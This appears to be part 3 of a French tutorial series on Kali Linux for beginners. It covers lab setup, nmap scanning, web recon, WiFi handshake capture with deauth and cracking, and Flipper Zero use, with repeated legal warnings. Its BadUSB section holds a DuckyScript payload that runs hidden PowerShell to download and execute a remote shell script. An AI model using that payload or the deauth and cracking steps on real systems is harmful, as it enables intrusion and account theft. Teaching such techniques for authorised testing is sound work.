Le Chemin du Hacker : Une Serie en 5 Parties
Partie 1 : Introduction → Partie 2 : Maitrise du Flipper → Partie 3 : Fondamentaux de Kali → Partie 4 : Exploitation → Partie 5 : L'Audit Complet
Dans les Parties 1 et 2, tu as clone des cartes, analyse des frequences radio et compris pourquoi la plupart de la "securite" n'est que du theatre. Tu as vu les vulnerabilites de l'exterieur. Maintenant tu entres a l'interieur et tu les vois du point de vue de l'attaquant.
Kali Linux est la distribution standard de l'industrie pour les tests de penetration. Elle est pre-chargee avec plus de 600 outils de securite. Ca peut paraitre ecrasant. La plupart des tutoriels te jettent dans le grand bain avec des commandes que tu ne comprends pas et sans contexte sur pourquoi elles sont importantes.
On fait les choses differemment. A la fin de cet article, tu auras un labo fonctionnel, tu comprendras la reconnaissance reseau a un niveau fondamental et tu captureras ton propre handshake WiFi. Chaque etape s'appuie sur la precedente.
Partie 1 : Construire Ton Laboratoire
Les testeurs de penetration professionnels n'executent pas Kali sur leur machine principale. Ils utilisent des environnements isoles qui peuvent etre reinitialises, snapshotes et detruits sans affecter leur systeme principal. Tu feras pareil.
Option A : Machine Virtuelle (Recommandee pour l'Apprentissage)
Une machine virtuelle te donne l'environnement d'apprentissage le plus sur. Tu peux faire des snapshots de ta progression, commettre des erreurs et revenir en arriere instantanement.
Ce Dont Tu Auras Besoin
- Machine hote : 16 Go+ de RAM, 50 Go+ d'espace disque libre, CPU moderne avec support de virtualisation
- Logiciel de virtualisation : VirtualBox (gratuit) ou VMware Workstation Player (gratuit pour usage personnel)
- Kali Linux : VM officielle pre-construite depuis kali.org
Projet : Configuration de la VM Kali
Temps : 30-45 minutes
Etapes :
- Telecharge l'image de la VM Kali pour ton hyperviseur (VirtualBox ou VMware)
- Extrais l'archive telechargee (7-Zip recommande pour Windows)
- Importe la VM dans ton hyperviseur
- Configure les ressources : 4 Go de RAM minimum (8 Go recommandes), 2+ coeurs CPU
- Active l'adaptateur reseau en mode "Bridged" pour un acces reseau complet
- Demarre la VM et connecte-toi avec les identifiants par defaut :
kali/kali - Ouvre le terminal et execute :
sudo apt update && sudo apt full-upgrade -y - Cree un snapshot nomme "Fresh Install" pour une recuperation facile
Verification du succes : Tu peux ouvrir un terminal, executer whoami et voir kali.
Option B : Materiel Dedie (Pour une Pratique Serieuse)
Une fois que tu es a l'aise avec Kali, le materiel dedie supprime la surcharge de la VM et permet un acces complet au materiel, ce qui est essentiel pour les tests sans fil.
Recommandations Materielles
| Option budget | ThinkPad X230/T430 d'occasion (100-150$), WiFi Intel remplace par Atheros AR9285 |
|---|---|
| Option moderne | Framework Laptop avec module WiFi compatible Linux |
| Capteur dedie | Raspberry Pi 5 4 Go avec adaptateur externe Alfa AWUS036ACH |
Pour l'instant, une VM est parfaite. Le materiel dedie devient important quand tu as besoin du mode moniteur pour les tests sans fil (couvert plus loin dans cet article).
Option C : USB Live (Zero Persistance)
Un USB live execute Kali directement sans installation. Tout disparait quand tu eteins. Utile pour tester sur differents materiels, mais tu perdras ton travail a chaque session sauf si tu crees une partition persistante.
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcherdd Detruit les Donnees
La commande dd ecrit directement sur le disque sans confirmation. Verifie trois fois le nom de ton peripherique. Ecrire sur le mauvais peripherique effacera completement ce disque.
Partie 2 : L'Etat d'Esprit Terminal
Avant de toucher aux outils de securite, tu dois etre a l'aise dans le terminal. Ce n'est pas optionnel. L'interface graphique existe dans Kali, mais le vrai travail se fait en ligne de commande.
Navigation Essentielle
1# Know where you are
2pwd # Print working directory
3
4# Move around
5cd /home/kali # Go to home directory
6cd .. # Go up one level
7cd - # Go to previous directory
8
9# See what's here
10ls # List files
11ls -la # List all files with details
12ls -lah # Human-readable sizes
13
14# Read files
15cat filename # Display entire file
16less filename # Scrollable view (q to quit)
17head -n 20 filename # First 20 lines
18tail -f filename # Follow file in real-time (logs)Escalade de Privileges
Beaucoup d'outils de securite necessitent un acces root. Dans Kali, sudo te donne des privileges root temporaires.
1sudo command # Run single command as root
2sudo -i # Start root shell (be careful)
3whoami # Check current user
4id # Show user and group IDsRoot avec Responsabilite
Executer en tant que root signifie aucun filet de securite. Une faute de frappe comme rm -rf / detruira tout. Kali moderne empeche cette commande specifique, mais le principe reste : comprends ce que tu executes avant de l'executer.
Gestion des Processus
1ps aux # All running processes
2top # Real-time process viewer
3htop # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c # Stop current process
7ctrl+z # Suspend process
8bg # Resume in background
9fg # Bring to foreground
10
11# Kill processes
12kill PID # Graceful termination
13kill -9 PID # Force kill (last resort)Commandes Reseau
1ip a # Show network interfaces
2ip route # Show routing table
3ping -c 4 8.8.8.8 # Test connectivity
4curl ifconfig.me # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.comProjet : Orientation Terminal
Temps : 15 minutes
Taches :
- Trouve ton adresse IP sur le reseau local avec
ip a - Identifie ta passerelle par defaut avec
ip route - Fais un ping a ta passerelle pour confirmer la connectivite
- Liste tous les fichiers dans
/etctries par date de modification :ls -lt /etc | head - Lis les 50 premieres lignes de
/etc/passwd:head -n 50 /etc/passwd
Objectif : Tu devrais pouvoir naviguer, verifier l'etat du reseau et lire des fichiers sans reflechir.
Partie 3 : Reconnaissance Reseau avec Nmap
Nmap (Network Mapper) est l'outil le plus important que tu apprendras. Il decouvre les hotes, identifie les services, detecte les systemes d'exploitation et cartographie la topologie du reseau. Tout le reste repose sur la sortie de nmap.
Ton Premier Scan
Scannons ton propre reseau. D'abord, identifie la plage de ton reseau :
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-2551# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnetTu verras une sortie comme :
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)Ce premier scan te dit : "Ces appareils existent sur mon reseau." Maintenant posons des questions plus profondes.
Detection de Services
Une fois que tu sais quels hotes existent, tu veux savoir quels services ils executent.
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)Sortie courante :
1PORT STATE SERVICE VERSION
222/tcp open ssh OpenSSH 8.4p1
380/tcp open http nginx 1.18.0
4443/tcp open ssl/http nginx 1.18.0Detection du Systeme d'Exploitation
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1Comprendre les Etats des Ports
Nmap rapporte les ports dans plusieurs etats :
- open - L'application accepte activement les connexions. C'est ce que les attaquants recherchent.
- closed - Le port est accessible mais aucune application n'ecoute. L'hote est actif mais il n'y a rien.
- filtered - Un pare-feu ou filtre bloque la sonde. Impossible de determiner si c'est ouvert ou ferme.
- unfiltered - Le port est accessible mais nmap ne peut pas determiner s'il est ouvert ou ferme.
Types de Scan et Furtivite
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap targetMoteur de Scripts Nmap (NSE)
NSE etend nmap avec des scripts specialises pour la detection de vulnerabilites, l'enumeration de services et plus encore.
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20Projet : Cartographie Ton Reseau
Temps : 30 minutes
Prerequis : Connaitre la plage de ton reseau depuis ip a
- Decouvre tous les hotes :
sudo nmap -sn TON_RESEAU/24 - Liste les hotes decouverts et leurs adresses MAC
- Choisis ton routeur (generalement .1) et execute :
sudo nmap -sV -sC TON_ROUTEUR - Identifie tous les ports ouverts et services sur ton routeur
- Execute
sudo nmap -A TON_ORDINATEURpour voir ce que ta propre machine expose
Documente : Cree un fichier texte listant chaque appareil, son IP, MAC et services. C'est ta carte reseau.
Ne Scanne Que les Reseaux Qui T'Appartiennent
Scanner des reseaux sans autorisation est illegal dans la plupart des juridictions. Meme un simple scan nmap peut etre considere comme un acces non autorise. Limite-toi a ton propre reseau, ton propre equipement et les reseaux ou tu as une permission ecrite explicite.
Partie 4 : Reconnaissance Web
Ton scan nmap a probablement trouve des services HTTP (ports 80, 443, 8080). Voyons ce qui tourne la-dessus.
Whatweb : Identification Rapide de Services
# Identify web technologies
whatweb http://192.168.1.1Exemple de sortie :
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]Nikto : Scanner de Vulnerabilites Web
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentialsEnumeration de Repertoires : Qu'est-ce Qui Est Cache ?
Les serveurs web ont souvent des repertoires non lies depuis la page principale : panneaux d'administration, fichiers de configuration, fichiers de sauvegarde.
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtDecouvertes courantes :
1/admin (Status: 301)
2/backup (Status: 403)
3/config (Status: 200)
4/login (Status: 200)Emplacement des Wordlists
Kali inclut des wordlists completes dans /usr/share/wordlists/. Les repertoires les plus courants : dirb/, dirbuster/, rockyou.txt (mots de passe) et seclists/ (collection complete).
Projet : Audite l'Interface Web de Ton Routeur
Temps : 20 minutes
- Execute
whatweb http://IP_DE_TON_ROUTEURpour identifier le serveur - Execute
nikto -h http://IP_DE_TON_ROUTEURpour verifier les vulnerabilites - Execute
gobuster dir -u http://IP_DE_TON_ROUTEUR -w /usr/share/wordlists/dirb/small.txt - Visite les repertoires decouverts dans un navigateur
- Note tout panneau d'administration, numero de version ou decouverte interessante
Decouverte courante : Pages d'administration du routeur exposees avec des identifiants par defaut.
Partie 5 : Reconnaissance Sans Fil
C'est la que les choses deviennent interessantes. Les reseaux WiFi emettent en permanence, et avec les bons outils, tu peux capturer des handshakes d'authentification : l'echange chiffre qui se produit quand un appareil se connecte.
Exigences Materielles
Ton WiFi integre ne fonctionnera probablement pas pour ca. Tu as besoin d'un adaptateur qui supporte le mode moniteur et l'injection de paquets. Recommandes : Alfa AWUS036ACH (~50$) ou Alfa AWUS036ACM (~45$). Ils fonctionnent directement avec Kali.
Comprendre le Mode Moniteur
Le mode WiFi normal ("mode gere") ne recoit que les paquets adresses a ton appareil. Le mode moniteur capture tous les paquets a portee, le trafic de chaque appareil sur le canal.
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0monScanner les Reseaux
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID = Router MAC address
6# PWR = Signal strength (higher = closer)
7# CH = Channel
8# ENC = Encryption (WPA2, WPA3, OPN)
9# ESSID = Network name
10
11# Press Ctrl+C to stopCe que tu vois, c'est chaque reseau WiFi a portee, leurs parametres de securite et souvent les appareils qui y sont connectes. C'est ce qu'un war driver voit en scannant les quartiers.
Capturer un Handshake
Quand un appareil se connecte a un reseau WPA2, il y a un handshake a quatre voies. Si tu captures ce handshake, tu peux tenter de cracker le mot de passe hors ligne.
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshakeQuand tu captures un handshake, airodump-ng affiche [ WPA handshake: XX:XX:XX:XX:XX:XX ] dans le coin superieur droit.
Les Attaques Deauth Sont Illegales
Envoyer des paquets de deauthentification a des reseaux qui ne t'appartiennent pas est un crime federal sous le Computer Fraud and Abuse Act (aux Etats-Unis) et des lois similaires ailleurs. Teste uniquement sur ton propre reseau. L'objectif est de comprendre la vulnerabilite, pas d'attaquer les autres.
Cracker le Handshake
Avec un handshake capture, tu peux tenter de cracker le mot de passe hors ligne avec une wordlist :
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtVerification de Realite sur la Force des Mots de Passe
rockyou.txt contient plus de 14 millions de mots de passe issus de fuites de donnees reelles. Si ton mot de passe WiFi est "password123" ou "ete2024" ou le nom de ton chien, il est crackable en secondes. Un mot de passe aleatoire de plus de 12 caracteres prendrait des millions d'annees a cracker par force brute.
Projet : Teste la Securite de Ton WiFi
Temps : 45 minutes
Prerequis : Adaptateur WiFi externe avec support du mode moniteur
- Active le mode moniteur :
sudo airmon-ng start wlan0 - Scanne les reseaux :
sudo airodump-ng wlan0mon - Note le canal et BSSID de ton propre reseau
- Capture sur ton canal :
sudo airodump-ng -c CHANNEL --bssid TON_BSSID -w monwifi wlan0mon - Reconnecte un appareil a ton WiFi (ou utilise deauth sur TON reseau)
- Confirme la capture du handshake
- Teste contre rockyou.txt :
aircrack-ng -w /usr/share/wordlists/rockyou.txt monwifi-01.cap
Resultat : Si ton mot de passe a ete trouve, change-le immediatement pour quelque chose d'aleatoire et long (plus de 20 caracteres).
Partie 6 : Connecter Ton Flipper Zero
Tu te souviens de toutes ces captures de la Partie 2 ? Integrons-les a ton flux de travail Kali.
Transfert de Fichiers
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/ # Sub-GHz captures
9/mnt/flipper/nfc/ # NFC dumps
10/mnt/flipper/infrared/ # IR captures
11/mnt/flipper/lfrfid/ # 125kHz RFID
12/mnt/flipper/badusb/ # BadUSB scriptsAnalyser les Dumps NFC
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | lessAnalyse Sub-GHz
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)Developpement BadUSB
Cree des payloads BadUSB dans Kali, teste-les sur le Flipper :
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/Les Payloads BadUSB Sont Puissants
Ces scripts s'executent automatiquement une fois branches. Un payload malveillant pourrait installer des backdoors, voler des identifiants ou detruire des donnees en quelques secondes. Utilise-les uniquement sur tes propres machines pour les tests. Ne laisse jamais ton Flipper la ou quelqu'un d'autre pourrait le brancher.
Partie 7 : Documentation et Flux de Travail
Les testeurs de penetration professionnels ne font pas que lancer des outils. Ils documentent tout. Une bonne documentation separe les amateurs des professionnels.
Prise de Notes avec CherryTree
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitationSauvegarder la Sortie Nmap
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml (parseable)
7# scan_results.gnmap (greppable)Journalisation de Session
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop loggingLe Chemin du Hacker
Une serie en 5 parties qui te fait passer de curieux a capable.
Partie 1 : Introduction Partie 2 : Maitrise du Flipper Partie 3 : Fondamentaux de Kali ✓ Partie 4 : Exploitation Partie 5 : Audit Complet
Checklist de la Partie 3
☐ Configuration du Lab : VM Kali fonctionnelle, mise a jour, snapshot sauvegarde
☐ Terminal : A l'aise avec la navigation, les permissions, le controle des processus
☐ Nmap : Reseau cartographie, services identifies, routeur scanne
☐ Recon Web : Interface web du routeur analysee avec whatweb/nikto
☐ Sans Fil : Mode moniteur active, reseaux scannes
☐ Handshake : Handshake WiFi personnel capture et teste
☐ Flipper : Fichiers transferes, flux de travail compris
☐ Documentation : Notes organisees, scans sauvegardes
Et Ensuite
Tu as construit ton laboratoire et appris la phase de reconnaissance. Tu peux decouvrir des hotes, identifier des services et capturer des handshakes sans fil. Tu comprends ce que les attaquants voient quand ils regardent un reseau.
Dans la Partie 4, on passe de la reconnaissance a l'exploitation. Tu apprendras :
- Metasploit Framework, le couteau suisse de l'exploitation
- Les flux de travail courants d'exploitation de vulnerabilites
- Les techniques de post-exploitation : ce qui se passe apres l'acces initial
- L'escalade de privileges : passer d'utilisateur normal a administrateur
- Le pivoting : utiliser un systeme compromis pour en attaquer d'autres
La reconnaissance te dit ou sont les portes. L'exploitation t'apprend a les traverser.
Tu as cartographie le territoire. Maintenant tu apprends a y naviguer. La Partie 4 te fait passer d'observateur a operateur.
On se retrouve dans la Partie 4.